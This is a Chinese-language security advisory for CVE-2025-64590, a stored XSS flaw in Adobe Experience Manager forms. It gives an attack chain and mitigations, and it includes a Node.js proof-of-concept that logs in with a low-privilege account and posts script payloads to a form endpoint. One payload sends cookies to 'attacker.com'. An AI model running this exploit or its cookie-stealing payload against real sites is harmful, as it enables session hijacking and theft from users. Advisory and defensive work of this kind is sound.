CVE-2025-64590 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64590

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64590是Adobe Experience Manager中的一个存储型跨站脚本攻击（Stored XSS）漏洞。该漏洞影响AEM 6.5.23及更早版本，允许低权限攻击者在易受攻击的表单字段中注入恶意JavaScript脚本。当受害者浏览包含恶意脚本的页面时，攻击者注入的payload会在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于该漏洞为存储型XSS，恶意脚本会永久保存在服务器端，影响所有访问该页面的用户。CVSS 3.1评分5.4属于中等严重程度，攻击复杂度低但需要用户交互，且攻击者需要拥有低权限账户。

技术细节

Adobe Experience Manager的表单处理组件未能对用户输入进行充分的HTML实体编码。当低权限用户向表单字段提交数据时，恶意JavaScript代码被直接存储在数据库中而未经安全过滤。在后续页面渲染过程中，这些未经过滤的数据被直接输出到HTML响应中，导致恶意脚本在用户浏览器中执行。攻击者利用此漏洞需要：1）拥有AEM的低权限账户；2）找到支持用户输入的表单字段；3）注入包含<script>标签或事件处理器（如onerror、onload）的XSS payload；4）诱导其他用户访问包含恶意内容的页面。由于脚本在受害者上下文中执行，攻击者可窃取Cookie、Session令牌、执行任意操作或修改页面内容。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标Adobe Experience Manager实例，使用低权限账户登录系统

STEP 2

2

注入阶段：攻击者在支持用户输入的表单字段中注入恶意XSS payload（如<script>标签或事件处理器）

STEP 3

3

存储阶段：恶意脚本被永久存储在AEM数据库中，未经过滤或转义处理

STEP 4

4

触发阶段：受害者访问包含恶意内容的页面，浏览器解析HTML时执行注入的JavaScript代码

STEP 5

5

利用阶段：攻击者通过XSS执行窃取Cookie/Session、劫持用户会话、修改页面内容或进行钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64590 Adobe Experience Manager Stored XSS PoC
// Target: Adobe Experience Manager forms
// Prerequisites: Low-privilege user account

const axios = require('axios');
const cheerio = require('cheerio');

class AEMXSSExploit {
    constructor(baseUrl, username, password) {
        this.baseUrl = baseUrl;
        this.username = username;
        this.password = password;
        this.session = axios.create({ baseURL: baseUrl });
    }

    async authenticate() {
        // Login to Adobe Experience Manager
        const loginData = new URLSearchParams({
            j_username: this.username,
            j_password: this.password,
            validate: 'true'
        });
        
        const response = await this.session.post('/libs/granite/core/content/login.html/j_security_check', loginData);
        console.log('[+] Authentication attempted');
        return response.headers['set-cookie'];
    }

    async injectXSSPayload(formPath, fieldName) {
        // Stored XSS Payload Injection
        const xssPayload = '<script>alert(String.fromCharCode(88,83,83,32,80,111,67))</script>';
        
        const formData = new FormData();
        formData.append(fieldName, xssPayload);
        formData.append('./jcr:data', xssPayload);
        
        // Alternative event handler payloads
        const altPayloads = [
            '<img src=x onerror="alert(document.cookie)">',
            '<svg onload="alert(document.domain)">',
            '<body onload="fetch(\\'https://attacker.com/steal?c=\\'+document.cookie)\\'>">'
        ];
        
        try {
            // Submit form with XSS payload
            const response = await this.session.post(formPath, formData, {
                headers: { 'Content-Type': 'multipart/form-data' }
            });
            console.log('[+] XSS payload injected successfully');
            console.log('[+] Payload:', xssPayload);
            return true;
        } catch (error) {
            console.error('[-] Injection failed:', error.message);
            return false;
        }
    }

    async verifyStoredXSS(pagePath) {
        // Verify the XSS payload is stored and rendered
        const response = await this.session.get(pagePath);
        const $ = cheerio.load(response.data);
        
        if ($.html().includes('<script>alert') || 
            $.html().includes('onerror') || 
            $.html().includes('onload')) {
            console.log('[+] Stored XSS verified!');
            console.log('[+] Payload persists in:', pagePath);
            return true;
        }
        return false;
    }
}

// Usage Example
const exploit = new AEMXSSExploit(
    'https://vulnerable-aem-instance.com',
    'lowpriv_user',
    'password123'
);

(async () => {
    await exploit.authenticate();
    await exploit.injectXSSPayload(
        '/content/forms/af/vulnerable-form/jcr:content/guideContainer.af.internalsubmit.jsp',
        'name'
    );
    await exploit.verifyStoredXSS('/content/forms/af/vulnerable-form.html');
})();

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager 6.5.x < 6.5.24

防御指南

临时缓解措施

立即将Adobe Experience Manager升级到6.5.24或更高版本以修复此漏洞。如无法立即升级，可采取以下临时措施：1）禁用或限制表单字段的用户输入功能；2）实施Web应用防火墙（WAF）规则过滤XSS特征；3）对所有表单输入启用严格的输入验证；4）配置HTTP安全响应头（X-XSS-Protection、X-Content-Type-Options）；5）监控和审查所有表单提交日志。同时建议审查现有表单内容，清除已注入的恶意脚本，并通知可能受影响的用户更换会话凭证。